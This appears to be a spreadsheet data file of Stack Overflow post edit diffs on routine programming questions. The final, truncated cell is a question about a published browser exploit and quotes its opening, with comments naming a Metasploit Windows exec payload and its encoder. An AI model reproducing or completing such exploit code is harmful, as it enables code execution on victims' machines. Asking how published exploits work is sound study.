Pathname.new('/opt/local/bin/ruby').basename_x000D_
# =&amp;gt; #&amp;lt;Pathname:ruby&amp;gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I haven't been a Windows user in a long time, but the Pathname rdoc says it has no issues with directory-name separators on Windows&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user46519</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The &lt;a href="http://channel9.msdn.com/pdc2008/TL11/" rel="nofollow noreferrer"&gt;video&lt;/a&gt; of the PDC great for starters. The &lt;a href="http://research.microsoft.com/en-us/um/cambridge/projects/fsharp/default.aspx" rel="nofollow noreferrer"&gt;official&lt;/a&gt; place has lot info too.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The &lt;a href="http://channel9.msdn.com/pdc2008/TL11/" rel="nofollow noreferrer"&gt;video&lt;/a&gt; of the PDC great for starters. The &lt;a href="http://research.microsoft.com/en-us/um/cambridge/projects/fsharp/default.aspx" rel="nofollow noreferrer"&gt;official&lt;/a&gt; place has lot info too.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I just stumbled on &lt;/span&gt;&lt;a href="http://sharp-gamedev.blogspot.com/2008/09/introduction.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;this&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; blog. Joh has a great explanation on your first steps in F#.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to checkout a repository via command line (the 'svn co' command), using the svn+ssh protocol. I need to checkout as a different user than what I currently am. The command &lt;code&gt;svn co svn+ssh://username@server/repo/&lt;/code&gt; would make sense, however when it prompts for a password, it never accepts it.&lt;/p&gt; _x000D_
 &lt;p&gt; How do I checkout a repository over svn+ssh with a different user?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to checkout a repository via command line (the 'svn co' command), using the svn+ssh protocol. I need to checkout as a different user than what I currently am. The command &lt;code&gt;svn co svn+ssh://username@server/repo/&lt;/code&gt; would make sense, however when it prompts for a password, it never accepts it.&lt;/p&gt; _x000D_
 &lt;p&gt; How do I checkout a repository over svn+ssh with a different user?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Edit to clarify a concern that this is off topic: I'm trying to create a script to update a website to the current version. This is where the script fails.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>davethegr8</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In BIDS, do the following:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-delete"&gt; Right&lt;/span&gt; Click&lt;span class="diff-delete"&gt; on the report (find an open space away from the controls but&lt;/span&gt; on &lt;span class="diff-delete"&gt;the design surface outside the page) then select &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Report Properties&lt;/span&gt;&lt;/code&gt; &amp;gt; &lt;code&gt;&lt;span class="diff-delete"&gt;Layout&lt;/span&gt;&lt;/code&gt; tab&lt;span class="diff-delete"&gt;. (&lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Note in later versions its the &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Page Setup&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; tab instead of &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Layout&lt;/span&gt;&lt;/code&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt;)&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; Make a note of the values for &lt;strong&gt;Page width&lt;/strong&gt;, &lt;strong&gt;Left margin&lt;/strong&gt;, &lt;strong&gt;Right margin&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; Close and go back to the design surface&lt;/li&gt; _x000D_
  &lt;li&gt; In the Properties window, select &lt;strong&gt;Body&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; Click the + symbol to expand the Size node&lt;/li&gt; _x000D_
  &lt;li&gt; Make a note of the value for &lt;strong&gt;Width&lt;/strong&gt;&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; To render in PDF correctly Body Width + Left margin + Right margin must be less than or equal to Page width. When you see blank pages being rendered it is almost always because the body width plus margins is greater than the page width.&lt;/p&gt; _x000D_
 &lt;p&gt; Remember: &lt;strong&gt;(Body Width + Left margin + Right margin) &amp;lt;= (Page width)&lt;/strong&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In BIDS, do the following:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; Click on &lt;span class="diff-add"&gt;Report&lt;/span&gt; &amp;gt; &lt;span class="diff-add"&gt;Report Properties &amp;gt; Layout&lt;/span&gt; tab&lt;/li&gt; _x000D_
  &lt;li&gt; Make a note of the values for &lt;strong&gt;Page width&lt;/strong&gt;, &lt;strong&gt;Left margin&lt;/strong&gt;, &lt;strong&gt;Right margin&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; Close and go back to the design surface&lt;/li&gt; _x000D_
  &lt;li&gt; In the Properties window, select &lt;strong&gt;Body&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; Click the + symbol to expand the Size node&lt;/li&gt; _x000D_
  &lt;li&gt; Make a note of the value for &lt;strong&gt;Width&lt;/strong&gt;&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; To render in PDF correctly Body Width + Left margin + Right margin must be less than or equal to Page width. When you see blank pages being rendered it is almost always because the body width plus margins is greater than the page width.&lt;/p&gt; _x000D_
 &lt;p&gt; Remember: &lt;strong&gt;(Body Width + Left margin + Right margin) &amp;lt;= (Page width)&lt;/strong&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>?megaman</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Note (Michael-O; 2015-03-24)&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt;: The same code above should not be used as it is not correct. First integrity on HTTP is pointless and cannot be used anyway. Second, the code does not loop until the security context has been established but immedately disposes the context. This is plain wrong.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Michael-O</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;echo date('r',strtotime("16 Dec, 2010")); //Tue, 16 Dec 2008 20:10:00 +0530_x000D_
echo date('r',strtotime("16 Dec  2010")); //Sat, 16 Jan 2010 00:00:00 +0530_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; That's just wrong... Either it should fail or it should parse correctly. Do you know any robust natural language date/time parser in php? How do you parse natural language date time in php?&lt;/p&gt; _x000D_
 &lt;p&gt; Edit 0:&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks a lot for your comments. I perhaps need to clarify the word "wrong" here. I wouldn't so much mind if strtotime always tried do a fuzzy match. But that it doesn't -&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var_dump(strtotime("16 Dec, abcd")); //bool(false)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; "16 Dec, 2010" is either a valid GNU date input format or it is not. In the first case it should return the correct answer and in the second it should return a false as it usually does when fed garbage. This is why I call it's current behaviour wrong.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;echo date('r',strtotime("16 Dec, 2010")); //Tue, 16 Dec 2008 20:10:00 +0530_x000D_
echo date('r',strtotime("16 Dec  2010")); //Sat, 16 Jan 2010 00:00:00 +0530_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; That's just wrong... Either it should fail or it should parse correctly. Do you know any robust natural language date/time parser in php? How do you parse natural language date time in php?&lt;/p&gt; _x000D_
 &lt;p&gt; Edit 0:&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks a lot for your comments. I perhaps need to clarify the word "wrong" here. I wouldn't so much mind if strtotime always tried do a fuzzy match. But that it doesn't -&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var_dump(strtotime("16 Dec, abcd")); //bool(false)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; "16 Dec, 2010" is either a valid GNU date input format or it is not. In the first case it should return the correct answer and in the second it should return a false as it usually does when fed garbage. This is why I call it's current behaviour wrong.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>anshul</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You should mention the caveats of looking at the source code, though. As Frans Bouma writes: &lt;a href="http://weblogs.asp.net/fbouma/archive/2007/10/04/don-t-look-at-the-sourcecode-of-net-licensed-under-the-reference-license.aspx" rel="nofollow noreferrer"&gt;Don't look at the sourcecode of .NET licensed under the 'Reference license'&lt;/a&gt;. He cites several risks, all related to the implied acquisition of un-free knowledge which might pose problems when writing own software. The most serious legal risk is probably related to involuntary patent infringements. Also, you're specifically &lt;strong&gt;forbidden&lt;/strong&gt; to contribute to certain other projects, such as &lt;a href="http://www.reactos.org/en/dev_legalreview.html" rel="nofollow noreferrer"&gt;ReactOS&lt;/a&gt; (and probably Mono), after having looked at similar source code. This might in the future also include the .NET source.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-add"&gt; Why bother using reflector? Just look at the original source code!&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; You should mention the caveats of looking at the source code, though. As Frans Bouma writes: &lt;a href="http://weblogs.asp.net/fbouma/archive/2007/10/04/don-t-look-at-the-sourcecode-of-net-licensed-under-the-reference-license.aspx" rel="nofollow noreferrer"&gt;Don't look at the sourcecode of .NET licensed under the 'Reference license'&lt;/a&gt;. He cites several risks, all related to the implied acquisition of un-free knowledge which might pose problems when writing own software. The most serious legal risk is probably related to involuntary patent infringements. Also, you're specifically &lt;strong&gt;forbidden&lt;/strong&gt; to contribute to certain other projects, such as &lt;a href="http://www.reactos.org/en/dev_legalreview.html" rel="nofollow noreferrer"&gt;ReactOS&lt;/a&gt; (and probably Mono), after having looked at similar source code. This might in the future also include the .NET source.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;script&amp;gt;_x000D_
$(document).ready(function(){_x000D_
    $(".remove-link").click(function() {_x000D_
        $(this).parent(".number-row").hide();_x000D_
    })_x000D_
})_x000D_
&amp;lt;/script&amp;gt;_x000D_
_x000D_
&lt;span class="diff-delete"&gt;            &lt;/span&gt;&amp;lt;div class="number-row" &amp;gt;_x000D_
&lt;span class="diff-delete"&gt;             &lt;/span&gt;   &amp;lt;div class="number-column"&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;div class="label-row"&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;             Select Country:_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;/div&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;div class="input-row"&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;             &amp;lt;select&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;                 &amp;lt;option&amp;gt;1&amp;lt;/option&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;                 &amp;lt;option&amp;gt;2&amp;lt;/option&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;             &amp;lt;/select&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;/div&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;div class="label-row"&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;             Select Toll Free or City:_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;/div&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;div class="input-row"&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;             &amp;lt;select&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;                 &amp;lt;option&amp;gt;1&amp;lt;/option&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;                 &amp;lt;option&amp;gt;2&amp;lt;/option&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;             &amp;lt;/select&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;/div&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;div class="label-row"&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;             Select Your Number:_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;/div&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;div class="input-row"&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;             &amp;lt;select&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;                 &amp;lt;option&amp;gt;1&amp;lt;/option&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;                 &amp;lt;option&amp;gt;2&amp;lt;/option&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;             &amp;lt;/select&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;/div&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;     &amp;lt;/div&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;             &lt;/span&gt;   &amp;lt;div class="number-column"&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;div class="label-row"&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;             Select Country:_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;/div&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;div class="input-row"&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;             &amp;lt;select&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;                 &amp;lt;option&amp;gt;1&amp;lt;/option&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;                 &amp;lt;option&amp;gt;2&amp;lt;/option&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;             &amp;lt;/select&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;/div&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;div class="label-row"&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;             Enter Number to Forward to:_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;/div&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;div class="input-row"&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;            &lt;/span&gt;            &amp;lt;input type="text" name="forward_number" id="forward_number" /&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;/div&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;div class="number-row-options"&amp;gt;_x000D_
                        &lt;span class="diff-delete"&gt;&amp;lt;a&lt;/span&gt; &lt;span class="diff-delete"&gt;class="save-link"&lt;/span&gt; &lt;span class="diff-delete"&gt;href="#"&amp;gt;Save&amp;lt;/a&amp;gt;&amp;lt;a&lt;/span&gt; class="remove-link" href="#"&amp;gt;Remove&amp;lt;/a&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;         &amp;lt;/div&amp;gt;                    _x000D_
&lt;span class="diff-delete"&gt;           &lt;/span&gt;     &amp;lt;/div&amp;gt;                    _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;script&amp;gt;_x000D_
$(document).ready(function(){_x000D_
    $(".remove-link").click(function() {_x000D_
        $(this).parent(".number-row").hide();_x000D_
    })_x000D_
})_x000D_
&amp;lt;/script&amp;gt;_x000D_
_x000D_
&amp;lt;div class="number-row" &amp;gt;_x000D_
   &amp;lt;div class="number-column"&amp;gt;_x000D_
         &amp;lt;div class="label-row"&amp;gt;_x000D_
             Select Country:_x000D_
         &amp;lt;/div&amp;gt;_x000D_
         &amp;lt;div class="input-row"&amp;gt;_x000D_
             &amp;lt;select&amp;gt;_x000D_
                 &amp;lt;option&amp;gt;1&amp;lt;/option&amp;gt;_x000D_
                 &amp;lt;option&amp;gt;2&amp;lt;/option&amp;gt;_x000D_
             &amp;lt;/select&amp;gt;_x000D_
         &amp;lt;/div&amp;gt;_x000D_
         &amp;lt;div class="label-row"&amp;gt;_x000D_
             Select Toll Free or City:_x000D_
         &amp;lt;/div&amp;gt;_x000D_
         &amp;lt;div class="input-row"&amp;gt;_x000D_
             &amp;lt;select&amp;gt;_x000D_
                 &amp;lt;option&amp;gt;1&amp;lt;/option&amp;gt;_x000D_
                 &amp;lt;option&amp;gt;2&amp;lt;/option&amp;gt;_x000D_
             &amp;lt;/select&amp;gt;_x000D_
         &amp;lt;/div&amp;gt;_x000D_
         &amp;lt;div class="label-row"&amp;gt;_x000D_
             Select Your Number:_x000D_
         &amp;lt;/div&amp;gt;_x000D_
         &amp;lt;div class="input-row"&amp;gt;_x000D_
             &amp;lt;select&amp;gt;_x000D_
                 &amp;lt;option&amp;gt;1&amp;lt;/option&amp;gt;_x000D_
                 &amp;lt;option&amp;gt;2&amp;lt;/option&amp;gt;_x000D_
             &amp;lt;/select&amp;gt;_x000D_
         &amp;lt;/div&amp;gt;_x000D_
     &amp;lt;/div&amp;gt;_x000D_
   &amp;lt;div class="number-column"&amp;gt;_x000D_
         &amp;lt;div class="label-row"&amp;gt;_x000D_
             Select Country:_x000D_
         &amp;lt;/div&amp;gt;_x000D_
         &amp;lt;div class="input-row"&amp;gt;_x000D_
             &amp;lt;select&amp;gt;_x000D_
                 &amp;lt;option&amp;gt;1&amp;lt;/option&amp;gt;_x000D_
                 &amp;lt;option&amp;gt;2&amp;lt;/option&amp;gt;_x000D_
             &amp;lt;/select&amp;gt;_x000D_
         &amp;lt;/div&amp;gt;_x000D_
         &amp;lt;div class="label-row"&amp;gt;_x000D_
             Enter Number to Forward to:_x000D_
         &amp;lt;/div&amp;gt;_x000D_
         &amp;lt;div class="input-row"&amp;gt;_x000D_
            &amp;lt;input type="text" name="forward_number" id="forward_number" /&amp;gt;_x000D_
         &amp;lt;/div&amp;gt;_x000D_
         &amp;lt;div class="number-row-options"&amp;gt;_x000D_
            &lt;span class="diff-add"&gt;&amp;lt;a&lt;/span&gt; &lt;span class="diff-add"&gt;class="save-link"&lt;/span&gt; &lt;span class="diff-add"&gt;href="#"&amp;gt;Save&amp;lt;/a&amp;gt;_x000D_
&lt;/span&gt;            &lt;span class="diff-add"&gt;&amp;lt;a&lt;/span&gt; class="remove-link" href="#"&amp;gt;Remove&amp;lt;/a&amp;gt;_x000D_
         &amp;lt;/div&amp;gt;                    _x000D_
     &amp;lt;/div&amp;gt;                    &lt;span class="diff-add"&gt;_x000D_
&amp;lt;/div&amp;gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>John Sheehan</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There's also the command line option "+":&lt;/p&gt; _x000D_
 &lt;pre&gt;vim &lt;span class="diff-delete"&gt;+star&lt;/span&gt; myfile.txt_x000D_
&lt;/pre&gt; _x000D_
 &lt;p&gt; Will open myfile.txt and do an automatic G for you.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There's also the command line option "+":&lt;/p&gt; _x000D_
 &lt;pre&gt;vim &lt;span class="diff-add"&gt;+&lt;/span&gt; myfile.txt_x000D_
&lt;/pre&gt; _x000D_
 &lt;p&gt; Will open myfile.txt and do an automatic G for you.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to pass a function as a parameter in C#? I can do it using the Func or Action classes, but this forces me to declare the entire function signature at once. When I try to use Delegate, I get a compile error saying it can't convert a method group to a Delegate. The use case is that I want to call MethodBase.Invoke on it, which doesn't require the parameter and return types to be known at compile time.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;_x000D_
// What goes in the ????_x000D_
public void InvokeMethod(???? method, object target, object[] params)_x000D_
{_x000D_
    method.Invoke(target, params);_x000D_
}&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
public &lt;span class="diff-delete"&gt;int&lt;/span&gt; Add(int a, int b)_x000D_
{_x000D_
    return a + b;_x000D_
}&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
public void Test()_x000D_
{_x000D_
    InvokeMethod(Add, 2, 3);_x000D_
}_x000D_
_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to pass a function as a parameter in C#? I can do it using the Func or Action classes, but this forces me to declare the entire function signature at once. When I try to use Delegate, I get a compile error saying it can't convert a method group to a Delegate. The use case is that I want to call MethodBase.Invoke on it, which doesn't require the parameter and return types to be known at compile time.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;_x000D_
// What goes in the ????_x000D_
public void InvokeMethod(???? method, object target, object[] params)_x000D_
{_x000D_
    method.Invoke(target, params);_x000D_
}_x000D_
public &lt;span class="diff-add"&gt;void&lt;/span&gt; Add(int a, int b)_x000D_
{_x000D_
    return a + b;_x000D_
}_x000D_
public void Test()_x000D_
{_x000D_
    InvokeMethod(Add, 2, 3);_x000D_
}_x000D_
_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dan Goldstein</t>
  </si>
  <si>
    <t>Jon Limjap</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;$rowfetch =~ s/['-]//g; #All chars inside the [ ] will be filtered out._x000D_
$rowfetch =~ m/(\w+), ?(.)/;_x000D_
printf $fh lc($2.$1);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I got help building this regular expression yesterday, but I don't fully understand it.&lt;br&gt;&lt;br&gt;It takes a name like Parisi, Kenneth and prints out kparisi&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Knowns&lt;/span&gt;:&lt;br&gt;s/ = substitute&lt;br&gt;m/ = match&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; I&lt;/span&gt; tried searching for the rest but couldn't find anything that really helped explain it.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; I&lt;/span&gt; also didn't understand how the =~ is supposed to evaluate to either true or false, yet in this situation, it is modifying the string.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;    &lt;/span&gt;$rowfetch =~ s/['-]//g; #All chars inside the [ ] will be filtered out._x000D_
&lt;span class="diff-add"&gt;    &lt;/span&gt;$rowfetch =~ m/(\w+), ?(.)/;_x000D_
&lt;span class="diff-add"&gt;    &lt;/span&gt;printf $fh lc($2.$1);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I got help building this regular expression yesterday, but I don't fully understand it.&lt;br&gt;&lt;br&gt;It takes a name like Parisi, Kenneth and prints out kparisi&lt;br&gt;&lt;br&gt;&lt;span class="diff-add"&gt;Knowns&lt;/span&gt;:&lt;br&gt;s/ = substitute&lt;br&gt;m/ = match&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;span class="diff-add"&gt;I&lt;/span&gt; tried searching for the rest but couldn't find anything that really helped explain it.&lt;br&gt;&lt;br&gt;&lt;span class="diff-add"&gt;I&lt;/span&gt; also didn't understand how the =~ is supposed to evaluate to either true or false, yet in this situation, it is modifying the string.&lt;span class="diff-add"&gt;&amp;nbsp;&lt;/span&gt;&lt;br&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>CheeseConQueso</t>
  </si>
  <si>
    <t>philant</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I usually do not have difficulty to read &lt;span class="diff-delete"&gt;JavaScript&lt;/span&gt; script but this one I can't figure out the logic. The code is from an Exploit that has been published 4 days ago. You can find it at [milw0rm][1].&lt;/p&gt; _x000D_
 &lt;p&gt; Here is the code :&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&amp;lt;html&amp;gt;_x000D_
    &lt;span class="xml"&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;div&lt;/span&gt; &lt;span class="hljs-attr"&gt;id&lt;/span&gt;=&lt;span class="hljs-string"&gt;"replace"&lt;/span&gt;&amp;gt;&lt;/span&gt;x&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;div&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
    &lt;span class="xml"&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;script&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class="xml"&gt;_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    // windows/exec - 148 bytes_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    // http://www.metasploit.com_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="xml"&gt;&lt;span class="xml"&gt;    // Encoder: x86/shikata_ga_nai_x000D_
